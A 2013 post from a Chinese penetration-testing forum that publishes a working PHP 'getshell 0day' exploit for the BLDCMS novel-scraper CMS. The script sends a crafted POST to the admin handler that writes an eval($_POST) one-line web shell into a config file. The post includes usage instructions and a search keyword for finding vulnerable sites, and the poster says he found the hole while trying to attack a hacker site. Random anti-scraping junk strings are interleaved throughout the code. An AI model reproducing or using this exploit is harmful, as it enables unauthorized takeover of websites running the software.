中国网络渗透测试联盟
标题:
BLDCMS(白老大小说) Getshell 0day EXP
[打印本页]
作者:
admin
时间:
2013-3-26 20:49
标题:
BLDCMS(白老大小说) Getshell 0day EXP
之前想搞一个黑阔站 发现旁站有一个站用了BLDCMS 我就下载看了.. 找到了一个getshell漏洞
# p/ l. J( g5 U3 E1 p; B
; T$ p0 {3 N; T% b" S
- I m3 y$ }$ a
话说昨晚晴天小铸在90sec发现有人把这getshell漏洞的分析发出来了 擦 居然被人先发了
5 }9 a8 f- I s. a3 v- L. }
1 v% |0 ]$ m' |3 W' t) {) W6 N7 X" t
既然都有人发了 我就把我之前写好的EXP放出来吧
0 ~# [4 C! r7 v
1 d, @. p) q9 X. B( o% v+ V
view source print?01.php;">
2 A2 [! c; M5 e! t
02.<!--?php
; l+ |, j6 r' ?/ A1 o$ e2 r
03.echo "-------------------------------------------------------------------
) F, X( a: L, W+ o l; ^; s
04.
6 i( b, U7 i9 ?
05.------------\r\n BLDCMS(白老大php小说小偷) GETSHELL 0DAY EXP
( C# m: G* Z0 i: T+ |4 a9 i
06.
3 s, k9 v5 Y( R' x
07.(GPC=Off)\r\n Vulnerability discovery&Code by 数据流@wooyun
6 F' F' W3 p1 O& }+ Z, e- G
08.
: [* m2 F# r8 w% k
09.QQ:981009941\r\n 2013.3.21\r\n
]3 P ~- \. r' Y7 _
10.
+ \8 x% t. F ?; A' J8 O5 ~
11.
1 y4 E/ R! |4 \, b% S% N
12.用法:php.exe EXP.php
www.baidu.com
/cms/ pass(一句话密码
" ]+ X% g0 g* N& D' @
13.
3 y+ }2 e: @* y3 T' Q8 g5 E% T3 U
14.)\r\n 搜索关键字:\"开发者: 白老大小说\"\r\n-----------
, j. i% a3 T$ a# Z% M4 K2 t
15.
: v) d' j v* G/ Z+ Y9 c8 \; @
16.--------------------------------------------------------------------\r\n";
% z. F. c( c% b2 i: q
17.$url=$argv[1];
9 U. v2 W7 v* r* G# Q* _0 ^( V
18.$dir=$argv[2];
* W6 Y0 t. H, ]+ U0 t4 Y: x$ ?# I
19.$pass=$argv[3];
; `7 o Y3 R; |; k' |/ @' G
20.$eval='\';eval($_POST['.'"'.$pass.'"'.']);\'';
3 c8 `- q7 h. N. h( l" s
21.if (emptyempty($pass)||emptyempty($url))
6 c, _4 [) `' w7 ^' e
22.{exit("请输入参数");}
* c: ]8 b- [1 J* b1 B" `$ C" u+ S
23.else
2 c/ ~9 ~* B3 @" f
24.{
2 u5 v7 N* j' Y4 P
25.$fuckdata='sitename=a&qq=1&getcontent=acurl&tongji=a&cmsmd5=1&sqlite='.$ev
) ?( s5 C( M: W: O, T. { x5 v1 d
26.
/ Y( O4 s: y# y L; X! ]; k
27.al;
6 b* K# {4 y' X+ [1 H% T
28.$length = strlen($fuckdata);
$ I: f, A; H9 v7 |. e
29.function getshell($url,$pass)
$ L# _) ]1 \, F8 B: l
30.{
" B% Y& t J6 E. B/ U z( C
31.global $url,$dir,$pass,$eval,$length,$fuckdata;
# O4 u! \, N& B+ E' w8 O' Y
32.$header = "
OST /admin/chuli.php?action=a_1 HTTP/1.1\r\n";
5 h* C) U$ f. ~8 ^
33.$header .= "Content-Type: application/x-www-form-urlencoded\r\n";
# a% E: `$ F% J+ V% Y
34.$header .= "User-Agent: MSIE\r\n";
! V6 E* t3 `' B9 `- } [; a
35.$header .= "Host:".$url."\r\n";
# U) k. }/ M. g* L
36.$header .= "Content-Length: ".$length."\r\n";
% ^( r& w2 J9 Q) g
37.$header .= "Connection: Close\r\n";
& s) A: K5 B* Y* u
38.$header .="\r\n";
& X& K* D; b2 }" X. U5 y' s
39.$header .= $fuckdata."\r\n\r\n";
7 T( a# M7 W2 l: \! [/ T2 C4 Z
40.$fp = fsockopen($url, 80,$errno,$errstr,15);
+ D/ b( S2 P j2 }6 g! U
41.if (!$fp)
' j0 I& u/ ]& F" `8 D
42.{
4 C# Z1 t- e7 ]/ @+ `! `& ~% S
43.exit ("利用失败:请检查指定目标是否能正常打开");
$ c4 Y2 I) P: ~ T5 o. @: g
44.}
* c5 @' L; _% R4 C! O; c* ?
45.else{ if (!fputs($fp,$header))
7 F* k$ X4 h; P/ E: x. x) `) B
46.{exit ("利用失败");}
1 [4 ~/ q1 O6 G$ A) Z# y
47.else
& k5 |5 }: ~: c+ W( N y, m: M/ [
48.{
& p" d! @( Q |- N
49.$receive = '';
# u! r9 }' @: V# O: ?0 Y8 a' B
50.while (!feof($fp)) {
' w0 N+ P0 D. k/ J, J& @/ y2 h
51.$receive .= @fgets($fp, 1000);
3 s2 w0 q2 S, B1 \! D+ i [' a! |
52.}
: {9 H: k, ]+ E$ L$ ]2 r
53.@fclose($fp);
$ Y4 b2 \/ e. @; T) |7 J
54.echo "$url/$dir/conn/config/normal2.php pass
pass(如连接失败 请检查目标
) H _* C& }7 Z% v4 |9 p
55.
+ x7 l1 x& Z: W
56.GPC是否=off)";
* L8 G/ F% Y$ a
57.}}
& R8 ]. P2 N/ N t* ]+ Q# U
58.}
2 R j5 G, ~& l+ ~; R2 I
59.}
7 [- m0 i+ Z& `( z
60.getshell($url,$pass);
8 T" z- G" L, c$ a. p7 c
61.?-->
8 f& z& ^- u2 G1 q! T7 a1 S2 l4 D: u
& H0 k" f. H7 i, I6 S/ Y
. a, G$ p( H2 W+ b9 z
% C G& G1 _+ s9 `. I
by 数据流
+ s5 r$ { a c( L: b4 u: v" U
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2